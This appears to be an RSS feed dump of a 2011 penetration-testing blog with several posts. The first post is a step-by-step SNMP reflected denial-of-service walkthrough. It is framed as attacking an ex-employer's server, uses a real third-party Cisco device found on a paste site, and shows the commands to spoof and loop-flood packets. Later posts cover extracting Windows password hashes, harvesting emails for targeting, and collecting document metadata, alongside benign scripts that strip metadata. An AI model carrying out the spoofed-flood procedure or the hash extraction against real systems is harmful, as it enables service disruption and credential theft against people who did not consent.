Anestis Bechtsoudis » pen-test http://bechtsoudis.com Driven by Passion for Challenges Tue, 01 Jul 2014 12:30:55 +0000 en-US hourly 1 http://wordpress.org/?v=3.9.2 SNMP Reflected Denial of Service http://bechtsoudis.com/2011/08/28/snmp-reflected-denial-of-service/#utm_source=rss&utm_medium=rss&utm_campaign=snmp-reflected-denial-of-service http://bechtsoudis.com/2011/08/28/snmp-reflected-denial-of-service/#comments Sat, 27 Aug 2011 21:04:17 +0000 http://bechtsoudis.com/?p=573 Recently i conducted a network penetration test on behalf of an academic institution. Apart from the security holes that i have discovered, i noticed the existence of many SNMP running services with their community strings publicly accessible. For monitor purposes network devices such as routers, switches, printers and voip devices have their read-only community strings enabled. Because of the read-only behavior of the public community many network and system administrators may assume that it is pointless to get into trouble securing them with ACLs or Firewall rules, making them accessible from any source IP. But is it really pointless?

What about 0-day bugs & exploits in the running snmp services? Yes i have to admit that it is a rare scenario, although not impossible specially for the network devices were we have infrequent or nonexistent OS updates.

But the real security hazard is the actual implementation of the SNMP protocol. In a common SNMP v1 and v2 transaction, the client sends a SNMP request with the relevant OID code and the SNMP server replies with the relevant data. SNMP is a connectionless UDP based protocol making it extremely vulnerable to IP spoofing. Somebody can capture a legitimate SNMP request, alter the source IP with an other and sends the request to the SNMP server on behalf of the edited IP. The response packet will be sent to the new IP address.

Let us assume the following scenario:
I want to conduct a DDoS attack targeting the main server of my ex company. I have scanned large subnets and found out open SNMP services (mostly routers, switches and network printers) knowing their public communities. Then I create a lot of SNMP request packets with victim’s server IP address as source and the list of the public SNMP services as destination addresses. The packet generator runs into loops to create large amounts of SNMP requests on behalf of the victim machine. All the SNMP responses with relevant payload are delivered to the victim server causing congestion and exhaustion to its resources.

The above scenario is the so called “SNMP Reflected Denial of Service“. Of course some ISPs, enterprise border routers and firewalls have mechanisms to prevent IP spoofing, although there exist techniques to bypass them that are beyond the scope of this article.

To present the convenience of the spoofed packet generation, I will present with every detail the whole procedure using the relevant tools.

 

First of all lets find out a publicly accessed SNMP service. When we talk about SNMP the first that comes to my mind is a Cisco device. The trivial method to discover an open service is to scan large subnets using relevant networking scanning tools. I will use a different approach using pastenum to search into text dump sites. Giving some Cisco configuration strings as input to pastenum, the first result have lead me to the 173.165.68.49 Cisco device.

Now that we have a public community lets create the test network as showed in the following image:

192.168.2.4 is the attacker’s machine.
192.168.2.5 is a test machine in which we will test our scenario before attacking the victim.
192.168.2.7 is the victim server.

Lets create now a simple snmp request using the snmpwalk tool, while in parallel we capture the traffic using the tcpdump tool.

root@192.168.2.4:~# snmpwalk -v 2c -c public 173.165.68.49 1.3.6.1
SNMPv2-MIB::sysDescr.0 = STRING: Cisco IOS Software, C2600 Software (C2600-ADVENTERPRISEK9-M), Version 12.4(17), RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2007 by Cisco Systems, Inc.
Compiled Fri 07-Sep-07 16:05 by prod_rel_team
root@192.168.2.4:~# tcpdump -nnvvSX -s 0 -i wlan0 -w capture.pcap
tcpdump: listening on wlan0, link-type EN10MB (Ethernet), capture size 65535 bytes 
 
36 packets received by filter
0 packets dropped by kernel

Using wireshark we can have a deeper look into the capture file and more specifically to the SNMP request.

Now that have studied the SNMP request packet form, lets isolate the first SNMP request (packet number 7) using the editcap tool.

root@192.168.2.4:~# editcap -r capture.pcap snmp_req.pcap 7
Add_Selected: 7
Not inclusive ... 7
root@192.168.2.4:~# tcpdump -nnvvSX -r snmp_req.pcap
reading from file snmp_req.pcap, link-type EN10MB (Ethernet)
21:26:47.371943 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 66)
    192.168.2.4.52717 > 173.165.68.49.161: [udp sum ok]  { SNMPv2c { GetNextRequest(23) R=184115647  .1.3.6.1 } }
	0x0000:  4500 0042 0000 4000 4011 8628 c0a8 0204  E..B..@.@..(....
	0x0010:  ada5 4431 cded 00a1 002e 0876 3024 0201  ..D1.......v0$..
	0x0020:  0104 0670 7562 6c69 63a1 1702 040a f961  ...public......a
	0x0030:  bf02 0100 0201 0030 0930 0706 032b 0601  .......0.0...+..
	0x0040:  0500                                     ..

The next step is to change the packet’s source IP address using the bittwiste packet editor which is part of the bittwist project. I will alter the source IP address from 192.168.2.4 to 192.168.2.5 which is an other PC in the subnet that we have access. The bittwiste tool automatically recalculates the new checksum. If you want more details about the tool you can refer to the official documentation.

root@192.168.2.4:~# bittwiste -I snmp_req.pcap -O spoofed_snmp_req.pcap -T ip -p 17 -s 192.168.2.5
input file: snmp_req.pcap
output file: spoofed_snmp_req.pcap
 
1 packets (80 bytes) written
root@192.168.2.4:~# tcpdump -nnvvSX -r spoofed_snmp_req.pcap
reading from file spoofed_snmp_req.pcap, link-type EN10MB (Ethernet)
21:26:47.371943 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 66)
    192.168.2.5.52717 > 173.165.68.49.161: [udp sum ok]  { SNMPv2c { GetNextRequest(23) R=184115647  .1.3.6.1 } }
	0x0000:  4500 0042 0000 4000 4011 8627 c0a8 0205  E..B..@.@..'....
	0x0010:  ada5 4431 cded 00a1 002e 0875 3024 0201  ..D1.......u0$..
	0x0020:  0104 0670 7562 6c69 63a1 1702 040a f961  ...public......a
	0x0030:  bf02 0100 0201 0030 0930 0706 032b 0601  .......0.0...+..
	0x0040:  0500

Now we need to send the new request with the spoofed IP using a packet generator, i choose the bittwist tool. In order to confirm that the answer to the request reaches the spoofed source i will launch a tcpdump capture to the 192.168.2.5 machine.

Firstly i use -d option of bittwist to list the interfaces and then i use the wlan0 device to send the spoofed packet.

root@192.168.2.4:~# bittwist -d
1. eth0
2. wlan0
3. usbmon1 (USB bus number 1)
4. usbmon2 (USB bus number 2)
5. usbmon3 (USB bus number 3)
6. usbmon4 (USB bus number 4)
7. usbmon5 (USB bus number 5)
8. usbmon6 (USB bus number 6)
9. usbmon7 (USB bus number 7)
10. vmnet8
11. usbmon8 (USB bus number 8)
12. any (Pseudo-device that captures on all interfaces)
13. lo
root@192.168.2.4:~# bittwist -i 2 spoofed_snmp_req.pcap
sending packets through wlan0
trace file: spoofed_snmp_req.pcap
 
1 packets (80 bytes) sent
Elapsed time = 0.000143 seconds
root@192.168.2.5:~# tcpdump -nnvvSX -s 0 -i eth0 -w capture.pcap
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
 
19 packets received by filter
0 packets dropped by kernel
root@192.168.2.5:~#
root@192.168.2.5:~# tcpdump -nnvvSX -r capture.pcap | grep SNMP
reading from file capture.pcap, link-type EN10MB (Ethernet)
22:15:20.295633 IP (tos 0x38, ttl 238, id 56597, offset 0, flags [none], proto UDP (17), length 330) 173.165.68.49.161 > 192.168.2.5.52717: [udp sum ok]  { SNMPv2c { GetResponse(283) R=184115647  .1.3.6.1.2.1.1.1.0="Cisco IOS Software, C2600 Software (C2600-ADVENTERPRISEK9-M), Version 12.4(17), RELEASE SOFTWARE (fc1)^M^JTechnical Support: http://www.cisco.com/techsupport^M^JCopyright (c) 1986-2007 by Cisco Systems, Inc.^M^JCompiled Fri 07-Sep-07 16:05 by prod_rel_team" } }

 

Knowing that our scenario works it is time to launch the actual attack to the target machine. We use again the bittwiste editor to change the source to 192.168.2.7 which is the victim’s IP address.

root@192.168.2.4:~# bittwiste -I snmp_req.pcap -O spoofed2_snmp_req.pcap -T ip -p 17 -s 192.168.2.7
input file: snmp_req.pcap
output file: spoofed2_snmp_req.pcap
 
1 packets (80 bytes) written

In order to see the bandwidth impact results, i will not send only one packet like our previous attempt, instead i will use the infinite loop flag from the bittwist packet generator.

root@192.168.2.4:~# bittwist -i 2 spoofed2_snmp_req.pcap -l 0
trace file: spoofed2_snmp_req.pcap
trace file: spoofed2_snmp_req.pcap
...
 
2061710 packets (164936800 bytes) sent
Elapsed time = 140.923743 seconds

I used the simple bandwidthd monitor tool to measure the bandwidth load. From the following graph it is pretty obvious that ~2M packets from only one source caused a measurable load to the victim machine. We reached a peak of ~40KB/sec while the normal UDP traffic is bellow 4KB/sec

Apart from the network load that i showed, an attacker can cause a service load too. This can be done by changing the SNMP request source port, using a victim’s open UDP port. This attack results in a great load to the running service that knees down the machine.

 

Conclusions:

It is now pretty obvious from the above facts that publicly accessible SNMP services can cause great loads to victim servers. Attackers can successfully launch DDoS attacks without needing to control large botnets. A few hosts that run the packet generation scripts are enough to conduct an efficient Reflected DDoS attack.
Till now i have never run this attack scenario in a large scale environment to include more details about the SNMP Reflected DDoS results. Although it is in my future plans to conduct a relative research.

 

PS: If someone have come across with a relative research, I would appreciate if he/she sent me an email with the sources.

 

DISCLAIMER: I’m not responsible with what you do with this info. This information is for educational purposes only.

 

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2011/08/28/snmp-reflected-denial-of-service/feed/ 4
Pastenum: Enumerating Text Dump Websites http://bechtsoudis.com/2011/06/08/pastenum-enumerating-text-dump-websites/#utm_source=rss&utm_medium=rss&utm_campaign=pastenum-enumerating-text-dump-websites http://bechtsoudis.com/2011/06/08/pastenum-enumerating-text-dump-websites/#comments Wed, 08 Jun 2011 16:24:49 +0000 http://bechtsoudis.com/?p=458 Text dump websites are used by programmers and system administrators to share and store pieces of source code and configuration information. Two of the most popular text dump websites are pastebin and pastie. Day by day more and more programmers, amateur system administrators and regular users are captivated by the attractive functional features of these web tools and use them in order to share large amounts of configuration and source code information. Therefore, like happening in each famous web platform, sensitive information sharing is inevitable. Potential attackers use these web platforms to gather information about their targets, while on the other side penetration testers search into these sites to prevent critical information leakage.

 

Most of the text dump web platforms offer a searching mechanism and therefore anyone can manually query the database for matching strings. Although an automated script/tool capable to query all these text dump websites and generate an overall searching report, would be very useful for the reconnaissance phase of a penetration test. Pen-testers can use such an automate tool, in order to efficiently search for potential configuration and login credentials information leakage that will help an attacker to profile the victim system and find a security hole.

Recently I came across in the web with such a script, pastenum. Pastenum is a ruby script written by Nullthreat member of the Corelan Team. It can query pastebin, pastie and github for user defined strings and generate an overall html report with the searching results.

 

Pastenum can be downloaded from here, while detailed installation information can be found here.

 

Let’s see some screenshots with pastenum in action.

 

 

 

 

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2011/06/08/pastenum-enumerating-text-dump-websites/feed/ 2
Gathering & Retrieving Windows Password Hashes http://bechtsoudis.com/2011/06/04/gathering-retrieving-windows-password-hashes/#utm_source=rss&utm_medium=rss&utm_campaign=gathering-retrieving-windows-password-hashes http://bechtsoudis.com/2011/06/04/gathering-retrieving-windows-password-hashes/#comments Sat, 04 Jun 2011 12:11:55 +0000 http://bechtsoudis.com/?p=437 Penetration tests might involve Windows user password auditing. In Windows systems (NT, 2000, XP, Vista, 7) user password hashes (LM and NTLM hashes) are stored in registry file named SAM (Security Accounts Manager). Until recently whenever I had to extract Windows password hashes I had two alternatives: the manual way or by using Windows password auditing suites (Cain&Abel, Ophcrack, L0phtCrack etc). But yesterday I came across in the web with a very useful python script named HashGrab2. HashGrab2 automatically mounts Windows drives and extracts username-password hashes from SAM and SYSTEM files located on the Windows drives using the samdump2 utility. HashGrab2 is ideal in cases that you just want to collect the Windows password hashes in order to import them to your preferred password cracker.

 

SAM Database Protection:

Offline Attacks: Microsoft introduced the SYSKEY utility in order partially encrypt the on-disk copy of the SAM file. Information about the SYSKEY encryption key is stored in the SYSTEM file located under the path %sysroot%/System32/config/.

Online Attacks: The SAM file cannot be moved or copied while Windows is running, since the Windows kernel obtains and keeps an exclusive filesystem lock on the SAM file, and will not release that lock until the operating system has shut down or a blue screen exception has been thrown.However, the in-memory copy of the contents of the SAM can be dumped using various techniques, making the password hashes available for offline brute-force attack.

 

HashGrab2:

HashGrab2,  written by s3my0n, is an offline gathering python script that automatically discover Windows drives and extracts the username-hash pairs to user defined file. HashGrab2 must be run as root (in order to mount the Windows drives) and requires python installed. It is preferable to install samdump2 from your distribution repositories in order to automatically acquire the username-hash pairs.

 

HashGrab2 can be downloaded from here.
zip md5sum:0db4f35062d773001669554c8e16015a

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
user1@bt5:Scripts$ ./hashgrab2.py 
 
  _               _                     _    ___  
 | |             | |                   | |  |__ \ 
 | |__   __ _ ___| |__   __ _ _ __ __ _| |__   ) |
 | '_ \ / _` / __| '_ \ / _` | '__/ _` | '_ \ / / 
 | | | | (_| \__ \ | | | (_| | | | (_| | |_) / /_ 
 |_| |_|\__,_|___/_| |_|\__, |_|  \__,_|_.__/____|
                         __/ |                    
                        |___/
 
 HashGrab v2.0 by s3my0n
 http://InterN0T.net
 Contact: RuSH4ck3R[at]gmail[dot]com
 
 [-] Error: you are not root

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
root@bt5:Scripts$./hashgrab2.py 
 
  _               _                     _    ___  
 | |             | |                   | |  |__ \ 
 | |__   __ _ ___| |__   __ _ _ __ __ _| |__   ) |
 | '_ \ / _` / __| '_ \ / _` | '__/ _` | '_ \ / / 
 | | | | (_| \__ \ | | | (_| | | | (_| | |_) / /_ 
 |_| |_|\__,_|___/_| |_|\__, |_|  \__,_|_.__/____|
                         __/ |                    
                        |___/
 
 HashGrab v2.0 by s3my0n
 http://InterN0T.net
 Contact: RuSH4ck3R[at]gmail[dot]com
 
 [*] Mounted /dev/sda1 to /mnt/qWLgG5
 
 [*] Mounted /dev/sda2 to /mnt/4sDAQO
 
 [*] Copying SAM and SYSTEM files...
 
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it
 
Root Key : CMI-CreateHive{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}
 
 [*] Unmounting partitions...
 
 [*] Deleting mount directories...
 
 [*] Deleting ['./4sDAQO']

 

1
2
3
4
root@bt5:Applications$cat 4sDAQO.txt 
Administrator:500:HASH:::
Guest:501:HASH:::
user1:1001:HASH:::

 
 

DISCLAIMER: I’m not responsible with what you do with this info. This information is for educational purposes only.

 
 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2011/06/04/gathering-retrieving-windows-password-hashes/feed/ 0
Enumerating Metadata: Part3 odf files http://bechtsoudis.com/2011/05/12/enumerating-metadata-part3-odf-files/#utm_source=rss&utm_medium=rss&utm_campaign=enumerating-metadata-part3-odf-files http://bechtsoudis.com/2011/05/12/enumerating-metadata-part3-odf-files/#comments Thu, 12 May 2011 15:44:04 +0000 http://bechtsoudis.com/?p=415 In the third part of the Enumerating Metadata sequence, we will talk about Open Document Format (ODF) supported by popular document software suites (OpenOffice, LibreOffice, Microsoft Office 2007 and more). ODF are XML-based file formats used to represent new-age electronic documents (spreadsheets, presentations, word documents etc). The standard ODF file is a ZIP commpressed archive containing the appropriate files and directories. The document metadata information is stored in a seperate XML file under the name meta.xml. The types of metadata contained in the file can comprise pre-defined metadata, user defined metadata, as well as custom metadata (like ODF version, Title, Description  and more).

The most common filename extensions used for OpenDocument documents are:

  • .odt for word processing (text) documents
  • .ods for spreadsheets
  • .odp for presentations
  • .odb for databases
  • .odg for graphics
  • .odf for formulae, mathematical equations

A packaged ODF file will contain, at a minimum, six files and two directories archived into a modified ZIP file. The structure of the basic package is as follows

|-- META-INF
|   `-- manifest.xml
|-- Thumbnails
|   `-- thumbnail.png
|-- content.xml
|-- meta.xml
|-- mimetype
|-- settings.xml
`-- styles.xml

 

Important! In case you encrypt your document using a protection password, the meta.xml file is not encrypted and is readable from anyone without knowning the document password. So be careful, password protection does not solve the metadata problem.

 

We can see that ODF metadata types contain large amount of usable information profiling editors and their software tools. An attacker can gather this kind of information and create a startup point for his exploitation attacks. So it is important for document users to control the information leakage emanated from hidden metadata.

Document software suites, such as OpenOffice and LibreOffice, offer editing options (usually under the path File->Properties) for the metadata types. You can use this feature in order to edit or clean the desired fields. The problem is that the previous method is per file, so if you have a large document database of ODF files that you want to handle, you obvious need an automated tool/script. Because ODF files are zip containers the solution if pretty easy. You can massively delete or update all meta.xml document files using the zip tool and it’s delete/update options. In case you delete the meta.xml from a document be careful, because the next time the document is saved from the relevant software, the XML is recreated with the software’s predefined values for the metadata fields.

I usually do not want any metadata leakage for my documents, so I delete the meta.xml file from the document container. I wrote a simple bash script which delete all meta.xml files from ODF documents under a user specified directory

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#!/bin/bash
 
#============================================================#
# Author     : Anestis Bechtsoudis                           #
# Date       : 12 May 2011                                   #
# Description: Bash script that removes metadata (meta.xml)  #
# from ODF (Open Document Format) files used from OpenOffice #
#============================================================#
 
SAVEIFS=$IFS
IFS=$(echo -en "\n\b")
 
if [ $# -ne 1 ] ; then
  echo "Usage: $0 [dir]"
  echo -e "\t[dir]: Directory containing ODF Files"
  exit
fi
 
#===============================================#
# Open Document format supports:                #
#    .odt for word processing (text) documents  #
#    .ods for spreadsheets                      #
#    .odp for presentations                     #
#    .odb for databases                         #
#    .odg for graphics                          #
#    .odf for formulae, mathematical equations  #
#                                               #
# Remove unwanted filetypes                     #
#===============================================#
FILETYPES='(odt)|(ods)|(odp)|(odb)|(odg)|(odf)'
 
# Temp file for search results
TMPFILE=/tmp/$0.tmp
 
find $1 -type f | egrep $FILETYPES > $TMPFILE
 
while read line
do
  zip -d $line meta.xml
done < $TMPFILE
 
rm $TMPFILE
 
IFS=$SAVEIFS

In case that you do not want to completely remove meta.xml files, you can write a basic meta.xml template and alter the above script in order update (instead of delete) all the meta.xml from ODF documents. The update can be done using the -f argument of the ZIP tool.

The above approach can be adopted under a Windows OS by writing the relevant batch files.
 

Useful sources:

 

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2011/05/12/enumerating-metadata-part3-odf-files/feed/ 0
Knowing is half the battle… http://bechtsoudis.com/2011/05/10/knowing-is-half-the-battle%e2%80%a6/#utm_source=rss&utm_medium=rss&utm_campaign=knowing-is-half-the-battle%25e2%2580%25a6 http://bechtsoudis.com/2011/05/10/knowing-is-half-the-battle%e2%80%a6/#comments Tue, 10 May 2011 19:46:43 +0000 http://bechtsoudis.com/?p=378 G.I. Joe used to say, “Knowing is half the battle.” The collection of prior information could make the difference between success and failure of a Penetration Test.

The first phase (reconnaissance phase) of a penetration test,  includes information gathering & network mapping procedures. Automated intelligent reconnaissance tools have been developed extensively the last years, offering a reliable and sprinting starting point for the exploitation phase. In this article, I will focus on information gathering tools in order to collect valid login names, emails, DNS records and WHOIS databases. A Penetration Tester can use the gathered information in order to profile the target, launch client side attacks, search into social networks for additional knowledge, bruteforce authentication mechanisms etc.

We can easily gather this information with simple scripts, without following an extensive OSINT (Open Source Intelligence) procedure. Although, I should mention that a detailed and extensive OSINT phase will have better results and will be necessary under certain business needs.

I will analyze Edge-Security’s theHarvester and Metasploit’s Search Email Collector tools.

 

theHarvester

theHarvester (currently at 2.0 version) is a python script that can gather email accounts, usernames and subdomains from public search engines and PGP key servers.

The tool supports the following sources:

  • Google – emails,subdomains/hostnames
  • Google profiles – Employee names
  • Bing search – emails, subdomains/hostnames,virtual hosts (requires bing API key)
  • Pgp servers – emails, subdomains/hostnames
  • Linkedin – Employee names
  • Exalead – emails,subdomain/hostnames

The latest version of theHarvester can be downloaded from the GitHub repository here.

Give execute permissions to the script file, and run it in order to see the available options.

$ ./theHarvester.py 
 
*************************************
*TheHarvester Ver. 2.0 (reborn)     *
*Coded by Christian Martorella      *
*Edge-Security Research             *
*cmartorella@edge-security.com      *
*************************************
 
Usage: theharvester options 
 
       -d: Domain to search or company name
       -b: Data source (google,bing,bingapi,pgp,linkedin,google-profiles,exalead,all)
       -s: Start in result number X (default 0)
       -v: Verify host name via dns resolution and search for vhosts(basic)
       -l: Limit the number of results to work with(bing goes from 50 to 50 results,
            google 100 to 100, and pgp does not use this option)
       -f: Save the results into an XML file
 
Examples:./theharvester.py -d microsoft.com -l 500 -b google
         ./theharvester.py -d microsoft.com -b pgp
         ./theharvester.py -d microsoft -l 200 -b linkedin

You can see some execution example in the following screenshots:

 

 

Metasploit Email Collector

Search email collector is a metasploit module written by Carlos Perez. The module runs under the metasploit framework and uses Google, Bing and Yahoo to create a list of valid email addresses for the target domain.

You can view the source code here.

The module options are:

DOMAIN The domain name to locate email addresses for
OUTFILE A filename to store the generated email list
SEARCH_BING Enable Bing as a backend search engine (default: true)
SEARCH_GOOGLE Enable Google as a backend search engine (default: true)
SEARCH_YAHOO Enable Yahoo! as a backend search engine (default: true)
PROXY Proxy server to route connection. <host>:<port>
PROXY_PASS Proxy Server Password
PROXY_USER Proxy Server User
WORKSPACE Specify the workspace for this module

 

Let’s see a running example:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
msf >; 
msf >; use auxiliary/gather/search_email_collector 
msf auxiliary(search_email_collector) >; set DOMAIN example.com
DOMAIN =>; example.com
msf auxiliary(search_email_collector) >; run
 
[*] Harvesting emails .....
[*] Searching Google for email addresses from example.com
[*] Extracting emails from Google search results...
[*] Searching Bing email addresses from example.com
[*] Extracting emails from Bing search results...
[*] Searching Yahoo for email addresses from example.com
[*] Extracting emails from Yahoo search results...
[*] Located 49 email addresses for example.com
[*] 	555-555-0199@example.com
[*] 	a@example.com
[*] 	alle@example.com
[*] 	b@example.com
[*] 	boer_faders@example.com
[*] 	ceo@example.com
[*] 	defaultemail@example.com
[*] 	email@example.com
[*] 	example@example.com
[*] 	foo@example.com
[*] 	fsmythe@example.com
[*] 	info@example.com
[*] 	joe@example.com
[*] 	joesmith@example.com
[*] 	johnnie@example.com
[*] 	johnsmith@example.com
[*] 	myname+spam@example.com
[*] 	myname@example.com
[*] 	name@example.com
[*] 	nobody@example.com
....

 

Useful links:

 

DISCLAIMER: I’m not responsible with what you do with this info. This information is for educational purposes only.

 

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2011/05/10/knowing-is-half-the-battle%e2%80%a6/feed/ 1
Enumerating Metadata: Part2 pdf files http://bechtsoudis.com/2011/05/03/enumerating-metadata-part2-pdf-files/#utm_source=rss&utm_medium=rss&utm_campaign=enumerating-metadata-part2-pdf-files http://bechtsoudis.com/2011/05/03/enumerating-metadata-part2-pdf-files/#comments Tue, 03 May 2011 00:26:57 +0000 http://bechtsoudis.com/?p=363 In my article Gathering & Analyzing Metadata Information I empasized the security risk of hidden metadata info of publicly shared documents and how this info can be gathered massively through certain tools. So I begun writing a series of articles in order to analyze the different types of file metadata and what tools can someone use in order to view and edit/remove them. In the first part, I analyzed the case of exif jpeg metadata and in this article I will continue with the famous Portable Document Format (PDF) file, presenting the appropriate tools to handle the metadata information.

We all use PDF files due to professional or personal needs of document sharing with others. PDF metadata is usually populated by PDF converting applications and might expose undesirable information to third-parties. Especially after the adoption of XMP (after version 1.6) in PDF metadata, there has been an increase in the available hidden information fields. Adobe Acrobat Pro offers an extended editor in order to edit metadata fields, but the Adobe Reader and many other editors and converters do not. Some of the metadata information fields are:

    • AdHocReviewCycleID
    • Appligent
    • Author
    • AuthorEmail
    • AuthorEmailDisplayName
    • Company
    • CreationDate
    • Creator
    • EmailSubject
    • Keywords
    • ModDate
    • PreviousAdHocReviewCycleID
    • Producer
    • PTEX.Fullbanner
    • SourceModified
    • Subject
    • Title

There exist a lot of tools that can extract/edit/remove PDF metadata information, but I prefer to use open source tools. So I will analyze the use of the PDF Toolkit (pdftk) under a linux environment. PDFTk does not require Acrobat and can run under Windows, Linux, Mac OS X, FreeBSD and Solaris systems. PDF Toolkit has many features but in this article I will cover the ones that we need for metadata manipulation.

Initially you will have to install pdftk using your distribution’s package manager or by compiling the sources.

In order to extract metadata information from a pdf file you can use the dump_data option as follows:

$pdftk file.pdf dump_data
InfoKey: Creator
InfoValue: PScript5.dll Version 5.2.2
InfoKey: Title
InfoValue: Microsoft Word - Ergastiriaki_Askisi_2011.doc
InfoKey: Author
InfoValue: Administrator
InfoKey: Producer
InfoValue: GPL Ghostscript 8.15
InfoKey: ModDate
InfoValue: D:20110406122119
InfoKey: CreationDate
InfoValue: D:20110406122119
PdfID0: bb8f9ac70cc66e8cabecb4144806f
PdfID1: bb8f9ac70cc66e8cabecb4144806f
NumberOfPages: 3

In order to edit metadata fields you have to extract metadata into a file, edit the desired values in the file and then update the pdf by importing the edited metadata file.

To extract metada to file use the output option:

$pdftk file.pdf dump_data output pdf-metada

Using your preferred text editor, you can edit the pdf-metadata InfoValues (I prefer to leave every field blank). Then you can update the initial file using the edited metadata file.

$pdftk file.pdf update_info pdf-metadata output no-metadata.pdf

In order to automate the above steps, I have wrote a simple script to work in a whole directory containing pdf files.

#!/bin/bash
SAVEIFS=$IFS
IFS=$(echo -en "\n\b")
 
if [ $# -ne 2 ] ; then
        echo "Usage: $0 [dir] [meta-file]"
        echo -e "\t[search_dir]"
        echo -e "\t\tDirectory with pdf files"
        echo -e "\t[metafile]"
        echo -e "\t\tFile containing desired metadata"
        exit
fi
 
PDFTK="/usr/bin/pdftk"
SOURCEDIR="$1"
METAFILE="$2"
PDFTMPFILE="/tmp/temp.pdf"
 
for i in $( find $SOURCEDIR -type f -name "*.pdf" ); do
  cp $i $PDFTMPFILE
  $PDFTK $PDFTMPFILE update_info $METAFILE output $i
  rm $PDFTMPFILE
done
 
IFS=$SAVEIFS

And here is a clean metadata file that you can use:

InfoKey: Author
InfoValue:
InfoKey: Company
InfoValue:
InfoKey: CreationDate
InfoValue:
InfoKey: Creator
InfoValue:
InfoKey: ModDate
InfoValue:
InfoKey: Producer
InfoValue:
InfoKey: SourceModified
InfoValue:
InfoKey: Title
InfoValue:

 

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2011/05/03/enumerating-metadata-part2-pdf-files/feed/ 1
Gathering & Analyzing Metadata Information http://bechtsoudis.com/2011/05/02/gathering-analyzing-metadata-information/#utm_source=rss&utm_medium=rss&utm_campaign=gathering-analyzing-metadata-information http://bechtsoudis.com/2011/05/02/gathering-analyzing-metadata-information/#comments Sun, 01 May 2011 23:14:55 +0000 http://bechtsoudis.com/?p=346 Any organization or individual who sends or receives files (documents, spreadsheets, images etc) electronically needs to be aware of the dangers of hidden metadata. Metadata information includes user names, path and system information (like directories on your hard drive or network share), software versions, and more. This data can be used for a brute-force attack, social engineering, or finding pockets of critical data once inside a compromised network. Thwarting an attacker’s attempts to exploit the metadata easily found on your company’s or personal website, in digital documents, and in search-engine caches is hard, if not nearly impossible.

Mass metadata information gathering can be accomplished pretty easily using search engines and their caching features. In this article i will present the use of MetaGoofil & FOCA, two free metadata information gathering & analyzing tools. Using these kind of gathering & analysis tools an attacker can gather large amounts of crucial information about a possible target organization or individual. On the other side, an IT Security Administrator can use these tools in order to locate the metadata information leakage of the organization and prevent or reduce it to a safe level.

 

FOCA

FOCA (Fingerprinting an Organization with Collected Archives) is one of the most popular pen-testing tools for automated gather and extraction of file metadata information developed by Informatica64. FOCA supports all the common document extensions (doc, docx, ppt, pptx, pdf, xls, xlsx, ppsx, etc). FOCA runs on Windows OS and you can download a free version from here. There is also a commercial version available.

FOCA is a pretty powerful tool with a lot of different options, although in this article I want to show how someone would use its basic feature set to search a domain for documents containing metadata. In order to do this you will first need to download and install FOCA and create a new project from the File menu. This project will need to be centered on a particular target domain. Once the project is created FOCA will use a list of search engines to search the domain for particular file types known to contain usable metadata.

 

Here are some screenshots of FOCA in action under a Windows 7 machine.

 

 

MetaGoofil

Metagoofil is an information gathering tool, that can extract metadata out of public documents (pdf, doc, xls, ppt, odp, ods) that are available in targeted websites. It can download all the public documents published in the target website and create an html report page which includes all the extracted metadata. At the end of the report there are listed all the potential usernames and disclosed paths recorded in the gathered metadata information. Using the list of potential usernames, an attacker can prepare a bruteforce attack on running services (ftp, ssh, pop3, vpn etc) and using the disclosed PATHs can make guesses about the OS, network names, shared resources etc.

Metagoofil uses google search engine in order to find documents that are published in the target website. For example, site:example.com filetype:pdf. After locating the file URLs, it downloads the files in a local directory and extract the hidden metadata using the libextractor. Metagoofil is written in python and can be run in any OS that fulfills the libextractor dependency. Depending your OS, you must edit the running script and provide the correct path of the extract binary.

You can download metagoofil from the official site, although google has changed the format of searching queries and the 1.4b version needs some alterations. For more information take a look at the unofficial fix.

Let’s see Metagoofil in action under a linux OS.

 

 

It is pretty obvious that the metadata gathering & extraction is easily accomplished. Recognizing the high security risk of hidden metadata leakage, I began writing a series of articles about metadata information included in different file types. I recently published the first part about exif jpeg metadata and I will continue with details and tools for others too.

 

DISCLAIMER: I’m not responsible with what you do with this info. This information is for educational purposes only.

 

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2011/05/02/gathering-analyzing-metadata-information/feed/ 3
DRIL: Domain Reverse IP Lookup Tool http://bechtsoudis.com/2011/04/10/dril-domain-reverse-ip-lookup-tool/#utm_source=rss&utm_medium=rss&utm_campaign=dril-domain-reverse-ip-lookup-tool http://bechtsoudis.com/2011/04/10/dril-domain-reverse-ip-lookup-tool/#comments Sun, 10 Apr 2011 18:37:06 +0000 http://bechtsoudis.com/?p=275 Reverse DNS Lookup process reveals the domain names that are associated with an IP address. Website owners/maintainers sharing hosting resources and penetration testers extensively use Reverse DNS Lookup to find out the domain names that are listed in the target host. A lot online lookup tools exist (like ip-address.com and domaintools.com) but i prefer to use a relative software tool for this work. Recently i come across in the web with the DRIL tool.

DRIL is a Reverse Domain Tool developed by Treasure Priyamal using the JAVA programming language and a Bing API Key. DRIL comes with a user friendly GUI in order to help pen-testers and website maintainers to work fast and efficiently. I have run with success DRIL under Linux and Windows XP & 7 OS.

 

You can download the latest version of DRIL from Sourceforge.

 

In order to run DRIL in a Linux environment execute:

$ java -jar DomainReverseIPLookup.jar

 

